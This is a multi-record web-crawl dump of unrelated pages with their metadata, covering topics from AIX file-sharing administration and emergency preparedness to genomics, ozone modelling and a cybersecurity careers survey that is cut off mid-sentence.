As our latest 5 in 5 predictions show, there is no challenge too big – or too small – for us to set our sights on if we’re only bold enough to take the chance. For more images, visit the IBM Research flickr page. Share this post:
<urn:uuid:eef3dd52-e58d-4fee-a199-5750af37a10e>
CC-MAIN-2017-04
https://www.ibm.com/blogs/think/2017/01/ibm-research-5-in-5-2017/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00339-ip-10-171-10-70.ec2.internal.warc.gz
en
0.928005
1,233
2.84375
3
National Preparedness Month: Make Your Plan Today By Lauren Morowit, CHHS Research Assistant If an emergency happens in your community tomorrow – will you be ready? September is National Preparedness Month in the United States, and government agencies are urging all citizens to consider developing an emergency communication plan. The slogan for this readiness campaign is, “Don’t Wait. Communicate.” Emergencies can happen at any time – with or without any warning. However, individuals can exercise the choice to prepare practical responses before an emergency strikes in an attempt to lessen the perilous effects of a tragedy. The message being proliferated this month highlights the notion that the public can better prepare themselves and their families by taking appropriate measures which include to: 1) Be Informed, 2) Develop a Plan, 3) Build a Kit, and 4) Get Involved. Recently, our nation has been facing challenges posed by instances of flash floods, historic earthquakes, hurricanes, water main breaks, and the spread of the Zika virus. An official website of the Department of Homeland Security (DHS), Ready.gov, is providing site visitors with ample resources and tools in order to promote an understanding of how to prepare for these kinds of emergency situations. The website also offers various templates available for download for the purpose of crafting emergency communication plans for individuals and families. Here are a few easy steps to start your emergency communication plan: - Find out how to receive emergency alerts and warnings from public safety officials. - Discuss family/household plans for disasters that may affect your area. - Collect information for all relevant contacts including medical facilities and schools. - Identify information and pick an emergency meeting place that is safe and familiar. - Share information and ensure everyone involved knows the plan details including roles and responsibilities. - Practice your plan to ensure its feasibility. Additionally, the Red Cross provides information describing the proper supplies that should be included in basic emergency preparedness kits. The guidelines for assembling an emergency preparedness kit emphasize the need for storing amounts of food and water that would be sufficient to sustain a 3-day supply for evacuation and a 2-week supply for home. Moreover, it is important to consider any unique needs for family members which may require specific medical supplies and baby supplies. The level of coordination involving readiness and relief efforts largely demands that federal agencies cooperate with local organizations and corporations. Nonetheless, National Preparedness Month is a reminder that citizens from every community can help do their part to keep the nation safe by expecting the unexpected.
<urn:uuid:636e475d-0261-482d-b4da-ed0a73108487>
CC-MAIN-2017-04
http://www.mdchhs.com/national-preparedness-month-make-your-plan-today/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280891.90/warc/CC-MAIN-20170116095120-00247-ip-10-171-10-70.ec2.internal.warc.gz
en
0.932826
522
3.390625
3
ARRA (American Recovery and Reinvestment Act): Also known as the "stimulus package of 2009," which includes HITECH. CA (Certificate Authority): A Certificate Authority issues digital certificates to organizations in order to ensure digital security on the Internet or other networks. Not all Certificate Authorities verify the validity and legality of organizations before issuing certificates like DigiCert does. CMS (Centers for Medicaid and Medicare Services): This group is a federal service organization that works to improve the health workforce, inform consumers, build collaborations, and make the healthcare system affordable while maintaining high value. Direct Address: It looks like an email and includes a health endpoint name (the location of a specific Direct user) and a health domain name (the location of a specific Direct HISP). DirectTrust: A non-profit alliance of healthcare industry participants formed to create a national Security and Trust Framework to better implement the Direct initiative. Direct Project- A federal initiative, spearheaded by the HHS and ONC, designed to facilitate the fast and secure transfer of health information. DirectTrust- A non-profit alliance of health care industry participants formed to create a national Security and Trust Framework to better implement the Direct initiative. DNS (Domain Name System): A system that assigns names to resources that connect to the Internet or networks. It facilitates rapid message transfer. DURSA (Data Use and Reciprocal Support Agreement): An agreement all organizations and agencies must enter into if they want to be involved in electronic health information exchange. These groups must abide by the standards set forth by the ONC. EHR (Electronic Health Record): A record of an individual or population which can include health information such as medical history, allergies, age, weight, billing address, etc. FBCA (Federal Bridge Certification Authority): The authority that sets the national standards for digital certificate transfer. HCO (Health Care Organization): An organization authorized by law to provide medical care and other health services for specific populations or coordinating bodies. HHS (Health and Human Services): The Department of Health and Human Services is the federal agency in charge of protecting and providing for the health of Americans. HISP (Health Information Service Provider): A for-profit corporation responsible for digitally delivering health information. HITECH (Health Information Technology for Economic and Clinical Health Act): A federal law that incentivizes medical providers to implement Health Information Technology. ISSO (Information Systems Security Officer): This individual ensures adequate protection of the Direct Cert Portal’s cryptographic keys. He or she also tracks and records who has access to the keys for their organization. Each HISP has at least one ISSO who ensures certificates are kept secure. MU (Meaningful Use): A program that encourages and incentivizes organizations to implement certified electronic health record technology. The goal of compliance is to improve clinical outcomes and general population health, increase transparency, and enable more robust research data. Objectives evolve in three stages: Stage 1 from 2011 to 2012, Stage 2 in 2014, and Stage 3 in 2016. ONC (Office of National Coordinator for Health Information Technology): ): The main federal agency within the Department of Health and Human Services that promotes health information technology across the U.S. Representative: Within the Direct Cert Portal, the representative can prove ownership of the organization and authorize HISPs to get certificates in the organization's name.
<urn:uuid:c4e7c078-134d-478e-96fd-0d41c7c98756>
CC-MAIN-2017-04
https://www.digicert.com/direct-project/glossary.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00063-ip-10-171-10-70.ec2.internal.warc.gz
en
0.902436
692
2.65625
3
The Common Internet File System (CIFS), also known as Server Message Block (SMB), is a standard remote file system access protocol over the Internet, enabling groups of users to work together and share documents and printers across the Internet or within corporate intranets. CIFS allows multiple clients to access and update the same file, while preventing conflicts with sophisticated file sharing and locking semantics. It also permits aggressive caching and read-ahead and write-behind without loss of cache coherency, thereby increasing the performance, which is the backbone of today's sophisticated enterprise computer networks. CIFS complements HTTP and provides more sophisticated file sharing and file transfer than older protocols, such as FTP. File sharing between PC operating systems, such as Windows®, is commonly implemented using the CIFS protocol, and file sharing between AIX® systems has been implemented using the Network File System (NFS) protocol. Since these two protocols being non-interoperable, products like AIX Fast Connect and AIX SMBFS allow PC clients to access and share files on the AIX server and vice versa. Overview of AIX Fast Connect AIX Fast Connect is server software that allows AIX servers to share files and printers with personal computer clients running the following Windows operating systems: - Windows XP - Windows 2000 - Windows 2003 - Windows NT - Windows 98Windows AIX Fast Connect provides the following: - A rich set of security features - High performance (SendFile API support and memory-mapped files ) - File safety specifications (so that multiple machines can access the same file without locking problems and opportunistic locking) - Maintenance and administration using the System Management Interface Tool (SMIT) - Secure authentication techniques (AIX-based user authentication, NT pass-through authentication, Lightweight Directory Access Protocol (LDAP) support for user authentication, Kerberos-based authentication, and CIFS password encryption protocols) Figure 1. AIX Fast Connect Note: AIX Fast Connect supports AIX 5.1 and above. Install the following filesets to configure AIX Fast Connect: Figure 2. Configuring AIX Fast Connect Only the root user can perform the configuration of Fast Connect for the AIX server; however, any user can access the configuration menu. Starting the Fast Connect server There are two ways in which you can start the Fast Connect server: Figure 3. Using SMIT - Select the - In the next screen, the command completes and displays the following Server servername has started successfully on servername Using the command line net start /load. - To verify, run the following: #ps -eaf | grep cifs root 503820 1 0 Aug 23 - 0:00 /usr/sbin/cifsUserProc root 565300 1 0 Aug 23 - 0:12 /usr/sbin/cifsServer root 823380 757910 0 12:55:44 pts/2 0:00 grep cifs These two processes, associated with Fast Connect, are responsible for the SMB request and response: - cifsServer is the main server daemon; it is a main server process owned by root. - cifsUserProc is a client session daemon; there is one cifsUserProc for each session. For every new request to the AIX Fast Connect server from the Windows client, a new cifsUserProc thread is created. There are two ways in which you can add a new file system share: - Enter the following command: - Select Server Shares > File Systems (Shared Volumes) > Add File Systems (Shared Volumes). Figure 4. Adding file systems Using the command line - Enter the following command: #net share /add /type:f /netname:TEST /path:/home/divya /desc:"File share test" Configuration of encrypted passwords and defining a user When the AIX Fast Connect server is configured for encrypted passwords, AIX Fast Connect attempts to authenticate all incoming SMB usernames and encrypted_password logins against the AIX Fast Connect /etc/cifs/cifsPasswd file. This file, initialized and maintained by the net user command, is a database of AIX Fast Connect users (and their encrypted passwords). All AIX Fast Connect users defined by the net user command should be AIX users. The passwords of the Fast Connect users are distinct from (and might differ from) the standard AIX passwords in the /etc/security/passwd file. When an AIX user changes their password (using /usr/bin/passwd), the AIX Fast Connect password for that user does not automatically change. - To enforce encrypted passwords for AIX Fast Connect, type: #net config /encrypt_passwords:2 - To configure a new user for encrypted passwords, type: #net user username password /add #net user username -p /add -pflag prompts for a no-echo password. - To change a user's encrypted password and also update that user's AIX #net user username password /changeaixpwd:yes #net user username -p /changaixpwd:yes Once the above configurations are done, stop and start the server. - To stop the server and unload the server daemon, type: #net stop /unload - To load the server daemon and enable PC clients to connect, type: #net start /load Now the Fast Connect server is ready to allow PC clients to connect and access the exported file shares. Mapping drives from the PC clients Typically, PC clients must define drive mappings to use the CIFS exported file shares. These drive mappings can be done from Windows or from the DOS command prompt. You can use the following mechanisms to define or undefine mappings between PC drives and CIFS file shares. For the following examples, assume that the NetBIOS server name is indus19.in.ibm.com and that file shares test, test1, is defined. For DOS, enter the following: DOS> net help (help info for DOS) DOS>net use F: \\indus19.in.ibm.com\test /user:tstuser tstpass DOS>net use H: \\indus19.in.ibm.com\test1 (When username and password is not specified in the command line, then a pop window appear asking for the username and the password) DOS> copy F:\oldfile H:\newfile (uses the mapped drives) DOS> net use F: /delete (delete the mapped network drive) For Windows, do the following: - In the Map Network Drive dialog box, select Windows Explorer > Tools > Map Network Drive, or right-click Network Neighborhood and select Map Network Drive. - Select the drive from the Drive: drop-down list, and then Enter the path. For example, see Figure 5 below. Figure 5. Mapping drives - To access the exported CIFS filesystems from Windows(Y:\), see Figure 6 below: Figure 6. Accessing the exported CIFS filesystems from Windows Here are some other useful commands: - To query the server's operational status, type: - To show general configuration information, type: - To show statistical information (for example, packets delivered), You can reset the statistics counts by typing net statistics /reseton the command line. - To query the status of logged-in user sessions, type: - To list all shares currently exported by the CIFS server, type: - To list all users configured in the /etc/cifs/cifsPasswd file, type: - To delete a user from the encrypted passwords database, type: #net user username /delete Overview of SMBFS AIX SMBFS is the client software that allows AIX servers to mount shares and exports from the SMB server like Windows XP, Windows 2003, Windows 2000, Windows NT, or Windows 98 operating systems into the AIX Virtual File System (VFS). This eliminates the need to install the NFS servers on the PC clients and to enhance the file sharing between SMB servers and AIX through the VFS interface. Components that make SMBFS - The device driver for a pseudo device—This driver allows SMBFS to communicate with the SMB server in case it needs to initiate a reconnection or finish receiving a multi-packet response without the need to stop all threads that are performing file operations. - The file system interface—This interface supports VFS and vnode operations. - The SMB interface—This interface generates and retrieves SMB information. AIX SMBFS requires the installation of the following filesets: |bos.cifs_fs.rte||Run time for SMBFS| |bos.cifs_fs.smit||SMIT Interface for SMBFS| - On the server side, share the folder that has to be exported to AIX. Right-click on Select Sharing and Security > Share this Folder > Permissions tab > Check all the permissions - Full control, Change, and Read > Apply and OK. Figure 7. Sharing a foldertstcifs is the shared folder, and the share name is tstcifs. Figure 8. The shared folder - On the client side, execute the following to mount the shares of the - Enter the following to ensure that the nsmb0 device is in the available state. The device is a pseudo device that helps SMBFS to communicate with the SMB server #lsdev -l nsmb0 - If the device is not present, run /etc/mkcifs_fs, which creates the nsmb0 device and brings it to the available state. - Run the following to create a mount point and give the full permission to the mount #mkdir /mnt #chmod 777 /mnt - Run the mount #mount -v cifs -n (servername)/username/password /(sharename) /(mountpoint) Figure 9. The shared folder The main functionality of the mount command is: - To create a SMBIOD thread (It is the parent thread of SMBFS; It is a kernel thread that creates the session and manages the connection. It also helps in sending and receiving the requests and responses between the server and the client. Every mount performed on AIX has a corresponding smbiod thread.) - To establish the network (NETBIOS) connection between the server and the client - To create a TREE CONNECT (directory structure of Windows is put in the mount point of AIX box) - Enter the following to ensure that the nsmb0 device is in the available state. The device is a pseudo device that helps SMBFS to communicate with the SMB server (Windows): - AIX Fast Connect overview: Browse the AIX Fast Connect Version 3.2 Guide. - Overview of Server Message Block: Get the overview of Server Message Block here. - AIX and UNIX: The AIX and UNIX developerWorks zone provides a wealth of information relating to all aspects of AIX systems administration and expanding your UNIX skills. - New to AIX and UNIX?: Visit the "New to AIX and UNIX" page to learn more about AIX and UNIX. - AIX Wiki: A collaborative environment for technical information related to AIX. - Search the AIX and UNIX library by topic: - developerWorks technical events and webcasts: Stay current with developerWorks technical events and webcasts. - Podcasts: Tune in and catch up with IBM technical experts. Get products and technologies - IBM trial software: Build your next development project with software for download directly from developerWorks. - Participate in the developerWorks blogs and get involved in the developerWorks community. - Participate in the AIX and UNIX forums:
<urn:uuid:5cdd38a9-11ee-458f-8308-89cd3b07761a>
CC-MAIN-2017-04
http://www.ibm.com/developerworks/aix/library/au-fastconnect/index.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284411.66/warc/CC-MAIN-20170116095124-00549-ip-10-171-10-70.ec2.internal.warc.gz
en
0.816812
2,583
2.71875
3
Specimen is a deceptively simple, utterly frustrating iOS game that you will struggle to defeat. You will probably lose, and it’s all thanks to your terrible vision. The premise of the game is basic: Match friendly-looking little blobs in a petri dish to the color outside the petri dish. Only one specimen matches the exterior exactly. It seems so easy. But the blobs are all variations on the same color, and you’ll quickly realize that your perception is not quite as good as you thought it was. But that’s the point. Specimen creators Erica Gorochow, Sal Randazzo, and Charlie Whitney designed the app at the New Museum’s New Inc. art and technology incubator in Manhattan. The game is fun, to be sure, but it’s much more than just a silly time-waster. The end goal of Specimen is to figure out how age, gender, geographic location, and screens affect the way we see color. In its early days—Specimen launched in July—the team noticed that players were struggling with greens more than any other color. “It’s counter to something we had found in the research phase, that we should be able to see a much larger range of greens because of how our eyes evolved,” Gorochow said. “That makes me curious what screens can do. If we do find that there is this pattern among greens, I’d be curious to find out why that is.” The game might also have some unintended results, like helping people discover they’re colorblind, or the opposite—that they’re tetrachromats, or have four types of cone cells in the eye, and can see thousands of colors the rest of us can’t. Part of the inspiration for Specimen came from tetrachromacy. Gorochow heard an episode of Radiolab that focused on the condition and wanted to see if an app could detect the way you see color. She needed data, and lots of it. But people wouldn’t use the app if it was a research experiment, so Specimen was born: an experiment disguised as an addictive iPhone game. How to beat the game…or at least try Specimen levels are grouped in spectrums of difficulty. The game starts off easy—each blob is very different, and though you only have seconds to match them, it’s a breeze. Then the levels get harder, but then a little easier, oh but then much harder. “You always have some hope when you start a spectrum,” Gorochow, the game’s animation designer, said. If you’re doing well, the spectrum of colors of the blobs inside the petri dish will shrink. Soon, they’ll all look similar in color to each, though each blob is actually a different hue. As of now, only a handful of people have beaten the game. Early players developed hacks for conquering levels: Some recommended turning the brightness on your iPhone screen as high as it will go, while others pause and unpause the game “because they think that gives them an advantage,” programmer and designer Charlie Whitney said. Spoiler alert: It doesn’t. Playing with the lights off in your room or purposefully blurring your eyes can also help you match the specimen to the background. To keep you motivated, Whitney designed the blobs to have some personality. They don’t just sit static in the petri dish; they move around at random and seem as friendly as blobs possibly can. But eventually, when frustration finally wins out, you will want to kill those blobs with fire. That’s where the music comes in. Music to keep you moving Gorochow enlisted her friends Cody Uhler and Ross Wariner, composers and sound designers who created the soundtrack for Two Dots, to set the mood for Specimen. If you’re anything like me, you play games with the sound turned off. But Specimen’s music is a mood-booster, especially when you keep dying. “It’s quirky, oddly groovy,” Uhler said. “The grooviness paired with the visuals make me think of a lava lamp sometimes. I don’t know if that’s a good thing or a bad thing.” It’s a good thing. The blobs are jelly-like, and the sound associated with tapping them makes you feel like you’re popping bubble wrap. The Specimen team told Uhler and Wariner to think “organic, science-y, amorphous.” The resulting three pieces of synthesizer-made music loop together to create a vaguely psychedelic experience, which might sound strange until you start playing. “Because it’s such a brutal game, it was important that the music was something that would get you into a flow state,” Gorochow said. “It had to be something that pulled you in and helped you forget how much time had passed. I think they got it there.” The music inspires you to keep playing, and the more you play, the more anonymized data the Specimen team can use to figure out differences in color perception. Gorochow, Randazzo, and Whitney are envisioning what’s next for Specimen—possibly an Android version of the game, but also something much larger. Literally. Imagine a Specimen installation in an art museum, like the grand piano keys at FAO Schwarz, but instead of running across the ivories, you’re tapping blobs. Specimen is an anomaly in the App Store: a game rooted in art and science with a larger purpose than just raking in cash. That it proves both fun and challenging to play is a testament to its creators. This story, "Meet Specimen, an iOS game that proves you can't see color as well as you thought" was originally published by Macworld.
<urn:uuid:260b2b66-e3b6-4c8c-8fe2-00b4d160ff46>
CC-MAIN-2017-04
http://www.itnews.com/article/2978143/ios-apps/meet-specimen-an-ios-game-that-proves-you-cant-see-color-as-well-as-you-thought.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282926.64/warc/CC-MAIN-20170116095122-00485-ip-10-171-10-70.ec2.internal.warc.gz
en
0.955576
1,277
2.703125
3
How NYC Officials Are Using LiDAR to Prepare for Future Storms With Sandy’s passing, LiDAR has again become the talk of the geospatial community. New York City officials plan on using LiDAR technology to accurately measure the city’s elevation. They’ll do so by flying aircrafts over the city and bounce lasers off the surface to determine changes and areas that need immediate attention. The data will then be used to prepare for future hurricanes. This isn’t the first time LiDAR has been used to access geographical changes after a hurricane. Research teams used this data system after hurricanes Katrina, Rita, and Isabel to determine their impact on environmental levels such as erosion and water How does LiDAR work? LiDAR works like radar except instead of emitting radio waves to measure what bounces back, it uses thousands of light waves. These light waves are used to provide 3-D information for an area and is useful for surface, vegetation, transportation corridor, transmission route, and 3-D building mapping respectively. LiDAR’s advantage over other geospatial tools is its ability to provide data over various landscapes. When light pulses bounce off water, it brings back a weaker signal than when it bounces off terrain. The image above illustrates Hatteras Island before and after Hurricane Isabel. To really understand what LiDAR is and its uses, please click here to receive your free LiDAR for Dummies eBook. Image courtesy of nasa.gov
<urn:uuid:ab84a59e-a85e-4434-b09e-b0854b6cfcae>
CC-MAIN-2017-04
http://blogs.dlt.com/nyc-officials-lidar-prepare-future-storms/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279169.4/warc/CC-MAIN-20170116095119-00304-ip-10-171-10-70.ec2.internal.warc.gz
en
0.911682
313
3.6875
4
Why are transportation problems popular applications for DSS? In the early 1970s, many researchers were trying to apply mathematical programming to business problems. The transportation problem was often discussed as an application that would benefit from computerization. Why? I think it is because this type of problem can be formulated quantitatively and because such problems are often complex enough to benefit from using a model. Also, the allocation of transportation resources among competing uses is of interest to business decision-makers in a number of different industries. In general, real-world transportation problems are often important! We have seen many different software programs for solving transportation problems, but the basic need remains the same. Managers want help in allocating a scarce resource. The basic problem formulation (cf., Hitchcock, 1941) has been adapted and expanded to a number of situations. A major application is scheduling airline routes. The following examples help explain why solving transportation problems are important to airlines. David Field in USAToday on Recently, Southwest Airlines implemented CALEB(TM) Technologies' CrewSolver DSS to reduce the cost from traffic control delays and mechanical and weather-related disruptions. For more information, check the So using Model-Driven DSS to solve transportation problems can improve profitability!! On a cautionary note Professor N. K. Kwak noted almost 30 years ago that "mathematical programming provides quantitative bases for management decisions -- bases with which management manipulates and controls various activities to achieve the optimal outcomes of business problems. Management can make better and more effective judgment by use of mathematical programming. However, it is no substitute for the decision maker's ultimate judgment." (p. 6) AND in response to a related question: What is a computer-aided routing system (CARS)? In reply to a question posted by Fred Njankou on Davis, J. L. "United overhaul brings decision-making down to earth", InfoWorld, Field, D. "Airlines pursue the trail of bucks", USAToday, Hitchcock, F. L. "Distribution of a Product from Several Sources to Numerous Localities", The Journal of Mathematics and Physics, vol. 20, August 1941, pp. 224-230. Kwak, N. K. Mathematical Programming with Business Applications. The above is from Power, D., Why are transportation problems popular applications for DSS? DSS News, Vol. 2, No. 9, Last update: 2005-08-07 11:37 Author: Daniel Power You cannot comment on this entry
<urn:uuid:babfb3cf-d00b-427f-9acd-4af5a0750529>
CC-MAIN-2017-04
http://dssresources.com/faq/index.php?action=artikel&id=74
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00120-ip-10-171-10-70.ec2.internal.warc.gz
en
0.934178
526
2.5625
3
When should I choose “text” or "number" or “multiple choice?” How you define a field will affect the type of data you get back, as well as its accuracy. “Text” is for fields with free-text, where either letters only, or a mix of numbers and letters, is filled in. "Short text" allows under 50 characters, "Medium text" allows under 70 characters and "long text" allows up to 2,000 characters. “Number” is for answers that include numbers and perhaps certain symbols, but no letters. If the number might have a decimal in it, select "decimal." If it is a whole number, select "whole number." You can also set constraints on the range and select which characters to allow in the answer. Use "Multiple-choice" whenever there are a finite number of possible answers. For example, if you are collecting contact information from people in three states, you can mark the State field as a multiple choice field, even if people will be handwriting their state, since there are only three options.“Select-1” is for multiple-choice questions with only one possible answer. “Select-many” is for multiple-choice questions with only multiple possible answers.
<urn:uuid:14997386-2b00-4478-86a3-3629f6aede94>
CC-MAIN-2017-04
https://support.captricity.com/faqs/selecting-field-type/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281151.11/warc/CC-MAIN-20170116095121-00202-ip-10-171-10-70.ec2.internal.warc.gz
en
0.915287
270
2.734375
3
A Survey of IBM Power Systems Initiatives in Large-Scale Computing The amount of data being produced does not seem to show any sign of slowing; if anything, it may in fact be exceeding projected growth rates. As these absolute limitations on raw hardware capacity begin to be felt, the importance of looking at all of the aspects of a computing infrastructure in order to tackle the future's truly large-scale computing demands, is imperative. This white paper examines how IBM's initiatives like Linux, Cloud Manager with OpenStack and the OpenPower Foundation IBM are meeting this challenge. In a paper published fifty years ago, Gordon Moore proposed his now-famous theory that the number of components per integrated circuit would double every two years. Moore's Law, as it became known, tends to be used primarily to describe the increase in computing capacity of CPUs. In tandem with the growth in CPU capacity, Moore also accurately predicted the exponential growth in volumes of data manipulated by progressively faster CPUs, as well as the ability to perform increasingly more complex operations on these volumes of data. In 2013 Google reported that the number of unique webpages in its search index stood at 30 trillion unique pages; the size of the index data itself weighed in at 1,000 terabytes. Yet, searching that index for "Moore's Law" will reliably return a result in well under a second. Manipulating data on such a scale and at such speed until recently has been restricted to a few very large players like Google, Yahoo, or Microsoft, using custom crafted and closely guarded proprietary solutions. In recent years there has also been a great deal of work done by the open source sector on large-scale computing projects. Perhaps the best example of this is the Hadoop project. Originating as the Nutch project at the University of Washington in 2002, Hadoop is now the primary implementation of the Map/Reduce methodology used to break down large problems into discrete chunks, each of which can be solved in parallel in a compute cluster. This produces linear scalability of computing capacity and hence the problem with cluster size. Today, state-of-the art has come to a point where IBM is integrating its developmentally mature Power computing architecture with a variety of IBM proprietary and open source projects to bring to the market off-the-shelf solutions allowing for broader adoption of large-scale computing capabilities for all customers. In this paper we will examine four such initiatives: the use of Linux on Power, the IBM Data Engine for Analytics, IBM Cloud Manager with OpenStack, and the OpenPower Foundation. Linux on Power As an operating system, Linux is most often associated with x86 hardware. This was certainly true when Linux was in its early growth years in the academic and hobbyist market. Linux was a good, free operating system that ran on inexpensive commodity x86 hardware. In the commercial marketplace, however, IBM has always been a strong supporter of Linux as an alternative operating system to closed source systems. In 1999 then IBM Vice President Sam Palmisano commissioned a study of Linux that resulted in CEO Lou Gerstner announcing that in IBM's eyes Linux would become "strategic to its software and server strategy." That announcement was followed up by the establishment that year of the IBM Linux Technology Center. The following year IBM publicly pledged to invest $1billion in Linux and the open source movement. Within the next two years IBM was running Linux on its core zSeries mainframe hardware, in 2007 IBM was a founding member of the Linux Foundation, and in 2011 IBM's cognitive computing engine, Watson, famously won "Jeopardy." Watson ran on Linux and was physically implemented on Power architecture. By this point Linux had become a significant development platform for large-scale and cloud computing projects. Recognizing this, in 2012 IBM announced that in the Power7 product line they would start shipping Linux-only models, released at a price point competitive with enterprise x86 hardware, and designed to support Linux KVM virtualization out of the box. In 2013 IBM announced a second $1billion investment, this one directed specifically at promoting Linux on the Power platform. The fourth Linux Technology Center also opened that year in Montpellier, France, adding to existing Linux centers in Beijing, New York City, and Austin, Texas. Perhaps the most important Linux announcement in 2013, however, was the launch of the OpenPower Foundation, making key features of the Power processor architecture available under license to third-party hardware developers. Keep in mind, too, that with the 2014 sale of its xSeries product line to Lenovo, x86 is now the competition for IBM, hence it is imperative for IBM that Power servers are given the support they need to compete with their x86-based competitors.
<urn:uuid:a072147d-560f-421e-9585-573988b27434>
CC-MAIN-2017-04
https://www.globalknowledge.com/ca-en/resources/resource-library/white-paper/a-survey-of-ibm-power-systems-initiatives-in-large-scale-computing/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281151.11/warc/CC-MAIN-20170116095121-00202-ip-10-171-10-70.ec2.internal.warc.gz
en
0.958011
959
2.65625
3
Remember learning about ozone? It was easy to relate to that distinctive smell that signaled the onset of precipitation. Even the chemical formula had a simple elegance, O3. We learned that a ring of these triatomic molecules created a protective buffer way up in the earth’s atmosphere, and that this layer filters out up to 99 percent of the sun’s harmful UV radiation, which would otherwise cause DNA damage in humans and animals. Ozone has a bit of a dual nature, however: a life-sustaining substance at higher altitudes becomes an air pollutant when it occurs at ground-level. And at higher concentrations, it can cause cause serious health problems. Scientists had already established that ozone concentrations, both in the atmosphere and on the earth’s surface, are linked to meteorological conditions, like temperature and prevailing winds, so perhaps long-term climate patterns would have a role to play as well. Eleni Katragkou, a climate scientist at Aristotle University of Thessalonikihe (AUTh) in Greece, decided to test this hypothesis. She wanted “to predict ozone behaviour in a changing climate, in order to be able assess the impacts on air quality, human health, agricultural production and ecosystems.” “People with lung diseases, children, older adults, and people who are active outdoors may be particularly sensitive to ozone,” Katragkou explained. “[Ozone] also affects sensitive vegetation and can damage crop production and ecosystems.” Using the grid computing resources of the AUTh computing centre (an EGI site), Katragkou’s team performed a series of regional climate-air quality simulations for two future decades (2041–2050 and 2091–2100) and one control decade (1991-2000) to study the impact of climate change on surface ozone in Europe. The simulations relied on an established climate model, called scenario A1B, developed by the Intergovernmental Panel on Climate Change (IPCC). The conclusions, published in the Journal of Geophysical Research, indicate that levels of ground level ozone are set to increase near the end of the century, with the highest concentrations expected for south-west Europe. The grid resources were crucial for the accuracy of the model, and allowed the simulations to be done in a reasonable time frame. Performed on a single desktop computer, the same job would have taken 40 years to complete. “The usual bottleneck for performing those types of simulations at a finer resolution is the huge demands on CPU time. This makes me think that grid computing may facilitate very much our future work in this direction,” Katragkou stated.
<urn:uuid:675161ba-a44c-434f-9899-39884bbe78cf>
CC-MAIN-2017-04
https://www.hpcwire.com/2013/01/25/grid_facilitates_ozone_predictions/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281151.11/warc/CC-MAIN-20170116095121-00202-ip-10-171-10-70.ec2.internal.warc.gz
en
0.94575
552
3.96875
4
The leap forward in genomics technology promises to change health care as we know it. Sequencing a human genome, which costs millions of dollars just a few years ago, now costs thousands. And the prospect of mapping a genome for under a thousand dollars is on the horizon. But cheap gene sequencing, by itself, won’t usher in a health care revolution. An article in the New York Times this week points out that turning those sequenced genomes into something useful is the true bottleneck. Doctors would like to be able to use their patients genome to determine their susceptibility to specific diseases or to devise personalized treatments for conditions they already have. Sequencing all the DNA base pairs is really the easy part of the problem. It just reflects the ordering of these bases — adenine (A) , thymine (T), guanine (G), cytosine (C) — in the chromosomes. The bioinformatics software necessary to extract useful information from this low-level biomolecular alphabet is much more complex and therefore costly, and necessitates a fair amount of computing power. According to David Haussler, director of the center for biomolecular science and engineering at the University of California, Santa Cruz, that’s why it costs more to analyze a genome than to sequence it, and that discrepancy is expected to grow as the cost of sequencing falls. The NYT article reports that the cost of sequencing a human genome has decreased by a factor of more than 800 since 2007, while computing costs have only decreased by a factor of four. That has resulted in an enormous accumulation of unanalyzed data that is being generated by all the cheap sequencing equipment. According to the article, the current capacity of sequencers worldwide is able to 13 quadrillion DNA base pairs per year. For this year alone, it is estimated that 30,000 human genomes will be sequenced, a figure that is expected to rise to the millions within just a few years. Not only is that too much data to analyze in aggregate, it’s also too difficult to share that volume of data between researchers. Even the fastest commercial networks are too slow to send multiple terabytes of information in anything less than a few weeks. That’s why BGI (Beijing Genomics Institute), the largest genomics research institute in the world, has resorted to sending computer disks of sequenced data via FedEx. Cloud computing may help alleviate these problems. In fact, some believe that Google alone has enough compute and storage capacity to handle the global genomics workload. Others believe that there is just too much raw data and researchers will have to pre-process it to reduce the volume or just hold onto the unique bits. But there are even more challenging problems ahead. Metagenomics, which aggregates DNA sequences of a whole population of organism, is even more data-intensive. For example, the microbial species in the human digestive tract represent about a million times as much sequenced data as the human genome. And since that microbial population can have a profound effect on the its human host, that genomic data becomes a pseudo-extension of the person’s genetic profile. On top of that is all is the data associated with the RNA, proteins and other various biochemicals in the body. To get a complete picture of human health, all of this data has to be integrated as well. Data deluge indeed.
<urn:uuid:d94bd833-4aa9-4837-be7a-671fcebb8bd1>
CC-MAIN-2017-04
https://www.hpcwire.com/2011/12/01/genomics_drowning_in_data/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00110-ip-10-171-10-70.ec2.internal.warc.gz
en
0.949145
697
3.078125
3
With some record-breaking and headline-grabbing cyber security breaches in 2015, security is top of mind for a large part of the population. However, if you ask millennials (people ages 18 to 26) how they view cyber security, you might get a different perspective. For this group of young adults – many of whom are about to enter the workforce – cyber security isn’t all that notable and it’s not career path they’re interested in. An October 2015 survey of millennials, conducted by Raytheon and the National Cybersecurity Alliance, took a deeper look at millennials’ attitudes toward cyber security careers. After polling young adults in 12 countries about their interest level and perception toward the field, the survey offers some helpful insights into cyber security recruitment barriers, and points to some key takeaways for solving this global problem. According to the report, there are four main contributing factors in millennials’ lagging interest in cyber careers: - Low awareness in schools. A majority of respondents (62%) indicated that no teacher or guidance counselor mentioned cyber security as a possible career path. And only 31% indicated that they were given coursework that would help prepare them for the career path. - Overconfidence. A majority of the individuals interviewed (65%) believe they have the ability to keep themselves safe online. Yet 44% of those who experienced a cyber attack did not change their behavior in response. - Lack of engagement. Security breaches may be showing up in the headlines, but they don’t seem to be reaching young adults’ social media feeds. Sixty-two percent of survey respondents hadn’t heard about a cyber attack in the past year. - A wide gender gap. The survey’s findings re-confirmed that there is a serious gender gap in cyber security, and it’s one that’s continuing with the millennial generation. In the U.S., 36% of surveyed women expressed disinterest in cyber security as 